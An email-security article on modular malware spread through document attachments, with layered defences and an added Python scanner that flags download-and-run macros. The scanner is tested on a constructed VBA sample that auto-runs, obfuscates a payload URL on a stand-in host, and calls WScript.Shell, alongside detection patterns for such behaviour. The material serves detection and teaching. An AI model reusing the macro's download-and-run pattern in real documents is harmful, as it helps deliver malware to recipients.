Cybercriminals use email to deliver modular malicious software, also known as modular malware. An ever-increasing trend, modular malware provides an architecture that is more robust, evasive and dangerous than typical document-based or web-based malware. Modular malware includes—and can selectively launch—different payloads and functionality, depending on the target and the goal of the attack. Most malware is distributed as a document attachment that is sent via spam to widely circulated email lists. These email lists are sold, traded, aggregated, and revised as they move through the dark web. Once an infected document is opened, either the malware is installed automatically, or a heavily obfuscated macro/script is used to download and install it from an external source. Occasionally, a link or other clickable item is used, but that approach is much more common in phishing attacks than in malware attacks. With the rise of botnets executing commands provided by cybercriminals and malware written for widespread distribution, modularity has become the new norm. Malware authors are increasingly organized and continue to adopt and implement software-industry practices, including quality assurance and testing, to improve the success of attacks. In response to the demand to meet multiple needs with one widely distributed malware file, modular malware has evolved to become more feature-rich and flexible.
The rapidly evolving threat environment requires a multi-layered protection strategy—one that closes the technical and human gaps—for every organization to maximize its email security performance and minimize the risk of falling victim to sophisticated attacks like modular malware.
Advanced inbound and outbound security techniques should be deployed, including malware detection, spam filters, firewalls, and sandboxing. For emails with malicious documents attached, both static and dynamic analysis can pick up on indicators that the document is trying to download and run an executable, which no document should ever be doing. The URL for the executable can often be flagged using heuristics or threat intelligence systems. Obfuscation detected by static analysis can also indicate whether a document may be suspicious. While many malicious emails appear convincing, spam filters and related security software can pick up subtle clues and help block potentially threatening messages and attachments from reaching email inboxes. If a user opens a malicious attachment or clicks a link to a drive-by download, an advanced network firewall capable of malware analysis provides a chance to stop the attack by flagging the executable as it tries to pass through. In addition, encryption and DLP (data loss prevention) help secure against accidental and malicious data loss. Plus, email archiving is critical for compliance and business-continuity purposes.
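The static-analysis indicators described above (auto-execution, download, execution and character-code obfuscation in a document macro) can be illustrated with a small heuristic scanner. This is an added example, not code from the original article or any product it describes; the indicator patterns and the two macro texts are constructed for the example, and the inert sample macro only carries the keywords a scanner would look for.

```python
import re

# Heuristic indicator patterns (constructed for this example; a real scanner
# such as olevba carries a much longer list).
INDICATORS = {
    "auto_exec": re.compile(r"\b(AutoOpen|AutoExec|Document_Open|Workbook_Open)\b", re.I),
    "download":  re.compile(r"\b(URLDownloadToFile|XMLHTTP|WinHttpRequest|DownloadFile)\b", re.I),
    "execute":   re.compile(r"(\bShell\b|WScript\.Shell|ShellExecute|\.Run\b)", re.I),
    "url":       re.compile(r"https?://[^\s\"']+", re.I),
    "write_exe": re.compile(r"\.exe\b", re.I),
}
# Obfuscation tells: strings assembled from character codes, or reversed.
OBFUSCATION = re.compile(r"\bChr[BW]?\s*\(\s*\d+\s*\)|\bStrReverse\b", re.I)

def analyze_macro(vba: str) -> dict:
    """Return the indicators hit, an obfuscation count and a verdict."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(vba))
    obf = len(OBFUSCATION.findall(vba))
    # Auto-execution plus download plus execution is the download-and-run
    # pattern the article says no document should ever exhibit.
    if {"auto_exec", "download", "execute"} <= set(hits):
        verdict = "block"
    elif hits or obf >= 3:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"indicators": hits, "obfuscation": obf, "verdict": verdict}

# Constructed, non-functional sample carrying the download-and-run keywords.
SAMPLE_MACRO = """\
Sub AutoOpen()
    ' constructed sample for exercising the heuristics; not a working macro
    Dim u As String
    u = "http://example.invalid/" & Chr(112) & Chr(97) & Chr(121) & "load.exe"
    Set h = CreateObject("MSXML2.XMLHTTP")
    Set s = CreateObject("WScript.Shell")
    s.Run u
End Sub
"""

# Constructed benign macro: ordinary spreadsheet formatting, no indicators.
BENIGN_MACRO = """\
Sub FormatReport()
    Range("A1:D1").Font.Bold = True
    Columns("A:D").AutoFit
End Sub
"""

if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, analyze_macro(text))
```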
Backup helps recover from data deletion, and continuity ensures that critical emails can still be sent during an outage.
Stop attacks that can bypass the email gateway. Artificial intelligence should be used for spear-phishing protection, and DMARC validation detects and prevents email and domain spoofing.
This top layer of email defense for every business is the most critical. Make phishing simulation and training part of security-awareness training. Ensure end users are aware of new types of attacks, show them how to identify potential threats and transform them from a security liability into a line of defense by testing the effectiveness of in-the-moment training and evaluating the users most vulnerable to attacks.